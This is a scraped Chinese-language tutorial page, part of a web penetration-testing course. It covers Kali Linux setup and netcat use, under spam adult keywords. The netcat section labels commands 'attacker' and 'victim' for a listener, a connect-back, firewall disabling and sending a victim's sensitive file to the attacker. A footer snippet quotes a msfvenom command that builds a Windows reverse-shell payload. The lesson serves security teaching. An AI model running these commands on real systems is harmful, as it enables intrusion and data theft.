国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

13.WEB滲透測試--Kali Linux(一)

這篇具有很好參考價值的文章主要介紹了13.WEB滲透測試--Kali Linux(一)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

免責聲明:內(nèi)容僅供學習參考,請合法利用知識,禁止進行違法犯罪活動!

內(nèi)容參考于: 易錦網(wǎng)校會員專享課

上一個內(nèi)容:12.WEB滲透測試-Linux系統(tǒng)管理、安全加固(下)-CSDN博客

kali由 Offensive Security 開發(fā)并重寫 BackTrack,Kali Linux 發(fā)行版在我們用于黑客目的的最佳操作系統(tǒng)列表中名列前茅。這個基于 Debian 的操作系統(tǒng)附帶了 600 多個預裝的筆測試工具,使您的安全工具箱更加豐富。這些通用工具會定期更新,并適用于 ARM 和 VMware 等不同平臺。對于司法鑒定工作,此頂級黑客操作系統(tǒng)具有實時啟動功能,該功能為漏洞檢測提供了理想的環(huán)境。

官方網(wǎng)站:Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

Kali Linux是基于Debian的Linux發(fā)行版,Kali Linux預裝了許多滲透測試軟件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng 超過300個滲透測試工具。安全軟件分為:信息收集、脆弱性分析、開發(fā)工具、無線攻擊、取證工具、Web應用程序、壓力測試、嗅探和欺騙、密碼攻擊、維護訪問權(quán)限、硬件攻擊、逆向工程、硬件攻擊。

1.kali的優(yōu)化

kali配置參考文檔:kali Linux的設置和優(yōu)化(雙系統(tǒng))_kailyouhua-CSDN博客

kali設置中文參考:kali linux設置中文方法 漢化教程-阿里云開發(fā)者社區(qū)

打開系統(tǒng)是英文界面,打開命令行

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

kali切換root用戶:

sudo su

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

更改鏡像源:

/etc/apt/sources.list 輸入vi /etc/apt/sources.list進入編輯界面后輸入國內(nèi)鏡像地址,并用#把原地址標注掉

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

中科大:deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

deb-src Index of /kali/ kali-rolling main non-free contrib

阿里云: deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

清華大學:deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

更新軟件數(shù)據(jù)庫:

sudo apt-get update

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

更新軟件:

sudo apt-get upgrade

更新過程中一直選擇yes

出現(xiàn){ok}需要點擊Tab鍵選中后才能按回車,不然會沒有反應

更新完成顯示界面

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

設置語言包:

sudo dpkg-reconfigure locales

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

注意:只選擇一種語言要是不小心多選上了,可以按空格取消,選中*號的語言后摁tab后回車

修改縮放比例:hidp

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

2.netcat簡介與使用

NC(netcat)被稱為網(wǎng)絡工具中的瑞士軍刀,體積小巧,但功能強大。Nc主要功能,Nc可以在兩臺設備上面相互交互,即偵聽模式/傳

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

快速查看ip指令:

ip a

攻擊者: nc -lnvp 8888

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

受害者: nc 攻擊者ip 攻擊者開放的端口號

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

效果演示:

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

?文章來源地址http://www.zghlxwxcb.cn/news/detail-839560.html

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

斷開連接:

ctrl+c

注意:兩臺機器不在同一個局域網(wǎng)內(nèi)通信需要使用反彈shell 兩臺機器在同一個局域網(wǎng)無法通信需要關(guān)閉防火墻

service firewalld status 查看防火墻狀態(tài) sudo systemctl stop firewalld 關(guān)閉防火墻 sudo systemctl start firewalld 開啟防火墻 sudo systemctl disable firewalld 永久關(guān)閉

傳輸文件內(nèi)容:受害者將自己本地的1.txt發(fā)送到攻擊者的1.txt里面,包含敏感信息的文件我們直接發(fā)送回來 攻擊者(服務端;接收):nc -lvp 端口號 > 1.txt加n更詳細

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

受害者(客戶端;發(fā)送):nc ip地址 端口號 < 1.txt

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

攻擊者的文件名可以隨便起,受害者這邊必須得有這個文件才能發(fā)送

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客

?

13.WEB滲透測試--Kali Linux(一),WEB滲透測試,網(wǎng)絡安全,滲透,黑客


?

?

到了這里,關(guān)于13.WEB滲透測試--Kali Linux(一)的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務器費用

相關(guān)文章

  • 網(wǎng)絡安全--Kali滲透Windows

    網(wǎng)絡安全--Kali滲透Windows

    這里我們學習使用Kali攻擊機來滲透Windows,這里使用的是msfvenom木馬來進行滲透。 命令: msfvenom -p windows/meterpreter/reverse_tcp lhost=127.0.0.1 lport=4444 -f exe -o payload.exe 這里說明一下,-p 是指使用的工具模塊,lhost是本機的IP地址,lport是本機的端口, -f 是指生成什么樣的文件,簡稱指定

    2024年02月05日
    瀏覽(18)
  • 使用 Kali Linux 進行 Web 滲透測試

    使用 Kali Linux 進行 Web 滲透測試

    在Web滲透中,信息就是力量、就是安全。因此,我們總是首先收集盡可能多的有關(guān)目標的信息——因為這可能會告訴我們實施攻擊的最佳方式。 一臺計算機(同一IP)上可以安裝多個網(wǎng)站。如果您無法進入目標,請嘗試侵入另一個網(wǎng)站。獲取同一 IP 上的網(wǎng)站(Robtex 除外)的

    2024年01月23日
    瀏覽(28)
  • 網(wǎng)絡安全kali web安全 Kali之msf簡單的漏洞利用

    網(wǎng)絡安全kali web安全 Kali之msf簡單的漏洞利用

    靶機的IP地址為:192.168.173.136 利用nmap工具掃描其開放端口、系統(tǒng)等 整理一下目標系統(tǒng)的相關(guān)信息 系統(tǒng)版本:Windows server 2003 開放的端口及服務: 從掃描出的端口發(fā)現(xiàn),目標主機開啟了135端口,服務為msrpc(遠程過程調(diào)用服務),即Windows的RPC服務。 ?針對這個服務,我們就可

    2024年02月09日
    瀏覽(24)
  • 網(wǎng)絡安全滲透測試實驗一

    網(wǎng)絡安全滲透測試實驗一

    理解網(wǎng)絡掃描、網(wǎng)絡偵察的作用;通過搭建網(wǎng)絡滲透測試平臺,了解并熟悉常用搜索引擎、掃描工具的應用,通過信息收集為下一步滲透工作打下基礎(chǔ)。 系統(tǒng)環(huán)境:Kali Linux 2、Windows 網(wǎng)絡環(huán)境:交換網(wǎng)絡結(jié)構(gòu) 實驗工具: Metasploitable2(需自行下載虛擬機鏡像);Nmap(Kali);

    2023年04月26日
    瀏覽(27)
  • 網(wǎng)絡安全入門 5 天速成教程_ WEB 安全滲透攻防技術(shù)

    網(wǎng)絡安全入門 5 天速成教程_ WEB 安全滲透攻防技術(shù)

    前言 隨著 Web 技術(shù)發(fā)展越來越成熟,而非 Web 服務越來越少的暴露在互聯(lián)網(wǎng)上,現(xiàn)在互聯(lián)網(wǎng)安全主要指的是 Web 安全。 為了自身不“裸奔”在大數(shù)據(jù)里,漸漸開始學習 Web 安全,在學習 Web 安全的過程中,發(fā)現(xiàn)很大一部分知識點都相對零散,如果沒有相對清晰 的脈絡作為參考,

    2024年04月23日
    瀏覽(35)
  • 【網(wǎng)絡安全】滲透測試之木馬免殺

    博主昵稱:跳樓梯企鵝 博主主頁面鏈接: 博主主頁傳送門 博主專欄頁面連接:

    2024年02月02日
    瀏覽(31)
  • 智能網(wǎng)聯(lián)汽車網(wǎng)絡安全測試:滲透測試,模糊測試詳細講解

    智能網(wǎng)聯(lián)汽車網(wǎng)絡安全測試:滲透測試,模糊測試詳細講解

    車內(nèi)網(wǎng)絡系統(tǒng)架構(gòu) 隨著智能網(wǎng)聯(lián)汽車電子系統(tǒng)的復雜化,電子電氣架構(gòu)( Electrical/Electronic Architecture, EEA )由分布式向集中式架構(gòu)演進,如圖 2.1 所示。 在汽車 EEA 演進的同時,為了滿足不同復雜程度的汽車功能對于通信性能的需求,車內(nèi)總線協(xié)議也在不斷發(fā)展。CAN 總線協(xié)

    2024年01月23日
    瀏覽(29)
  • 記一次網(wǎng)絡安全滲透測試實戰(zhàn)指南

    記一次網(wǎng)絡安全滲透測試實戰(zhàn)指南

    網(wǎng)址已無法訪問,就不貼了 可以使用Fofa,火線,zoomeye,searchcode.com等爬取相關(guān)的資產(chǎn),重點關(guān)注一些有漏洞暴露的框架和服務例如:泛微,PHP,Tomca,后臺,weblogic等等。之后就主要分三步: 指紋識別、漏洞驗證、漏洞復現(xiàn)。 指紋識別很好理解,我們要拿歷史漏洞懟它,首

    2024年02月08日
    瀏覽(51)
  • 網(wǎng)絡安全滲透測試的八個步驟

    網(wǎng)絡安全滲透測試的八個步驟

    ?一、明確目標 ?1.確定范圍:測試目標的范疇、ip、網(wǎng)站域名、內(nèi)外網(wǎng)、檢測帳戶。 2.確定標準:能滲入到何種程度,所花費的時間、能不能改動提交、能不能漏洞利用、這些。 3.確定要求:web應用的漏洞、業(yè)務邏輯漏洞、工作人員管理權(quán)限管理漏洞、這些。 ?二、信息收

    2024年02月04日
    瀏覽(25)
  • 網(wǎng)絡安全從業(yè)人員應該如何提升自身的web滲透能力?

    網(wǎng)絡安全從業(yè)人員應該如何提升自身的web滲透能力?

    前言 web 滲透這個東西學起來如果沒有頭緒和路線的話,是非常燒腦的。 理清 web 滲透學習思路,把自己的學習方案和需要學習的點全部整理,你會發(fā)現(xiàn)突然滲透思路就有點眉目了。 程序員之間流行一個詞,叫 35 歲危機,,意思就是說 35 歲是個坎,容易被淘汰。 那么安全行

    2023年04月09日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包